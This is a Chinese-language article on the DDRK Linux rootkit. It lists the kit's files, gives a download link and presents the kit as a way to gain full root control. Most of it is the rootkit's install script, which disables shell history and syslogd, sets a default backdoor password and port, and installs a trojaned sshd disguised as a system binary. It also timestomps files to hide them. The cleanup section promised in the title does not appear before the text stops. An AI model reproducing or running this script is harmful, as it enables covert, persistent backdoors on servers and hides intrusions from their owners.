Linux下rootkit-ddrk攻击获得root权限以及清除方法

DDRK是一个Linux结合shv和adore-ng优点，内核级别的rootkit。

DDRK中包含的文件：

netstat  #替换系统中的netstat，从ssh配置文件中读取端口并隐藏

rk.ko  #内核模块，实现文件和进程的隐藏功能

setup  #rootkit安装文件

tty  #ava工具

bin.tgz

         ---ttymon

         ---sshd.tgz

                   ---.sh

                            ---shdcf2  #sshd配置文件

                            ---shhk

                            ---shhk.pub

                            ---shrs

                            ---sshd  #sshd主程序

DDRK下载地址：http://www.sectop.com/soft/ddrk.tgz

因此只要把这些文件上传到服务器上并成功运行，就可以获得该服务器的root权限。为所欲为，无所不能。

setup内容如下：

#!/bin/bash

##########define variables##########

DEFPASS=123456    //默认密码

DEFPORT=43958    //默认端口

BASEDIR=`pwd`

SSHDIR=/lib/libsh.so

HOMEDIR=/usr/lib/libsh

unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE

export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

##########check is root##########

if [ "$(whoami)" != "root" ]; then

   echo "BECOME ROOT AND TRY AGAIN"

   echo ""

   exit

fi

##########extract all tar##########

tar zxf bin.tgz

cd bin

tar zxf sshd.tgz

rm -rf ./sshd.tgz

cd $BASEDIR

rm -rf bin.tgz

cd $BASEDIR

##########kill syslogd##########

killall -9 syslogd >/dev/null 2>&1

sleep 2

##########remove sh.conf##########

if [ -f /etc/sh.conf ]; then

  rm -rf /etc/sh.conf         //经过md5sum加密过的密码文件

fi

##########initialize sshd configuration##########

if test -n "$1" ; then

   echo "Using Password : $1"

   cd $BASEDIR/bin

   echo -n $1|md5sum > /etc/sh.conf

else

   echo "No Password Specified, using default - $DEFPASS"

   echo -n $DEFPASS|md5sum > /etc/sh.conf

fi

touch -acmr /bin/ls /etc/sh.conf

chown -f root:root /etc/sh.conf

if test -n "$2" ; then

   echo "Using ssh-port : $2"

   echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config

   cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2

   mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf

else

   echo "No ssh-port Specified, using default - $DEFPORT"

   echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config

   cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2

   mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf

fi

###########creating dirs##########

SSHDIR=/lib/libsh.so

HOMEDIR=/usr/lib/libsh

if [ -d /lib/libsh.so ]; then

   rm -rf /lib/libsh.so

fi

if [ -d /usr/lib/libsh ]; then

   rm -rf /usr/lib/libsh/*

fi

mkdir $SSHDIR

touch -acmr /bin/ls $SSHDIR

mkdir $HOMEDIR

touch -acmr /bin/ls $HOMEDIR

cd $BASEDIR/bin

mv .sh/* $SSHDIR/

mv .sh/.bashrc $HOMEDIR

if [ -f /sbin/ttyload ]; then

   chattr -AacdisSu /sbin/ttyload

   rm -rf /sbin/ttyload

fi

if [ -f /usr/sbin/ttyload ]; then

   rm -rf /usr/sbin/ttyload

fi

if [ -f /sbin/ttymon ]; then

   rm -rf /sbin/ttymon

fi

mv $SSHDIR/sshd /sbin/ttyload

chmod a+xr /sbin/ttyload

chmod o-w /sbin/ttyload

touch -acmr /bin/ls /sbin/ttyload

kill -9 `pidof ttyload` >/dev/null 2>&1

mv $BASEDIR/bin/ttymon /sbin/ttymon

chmod a+xr /sbin/ttymon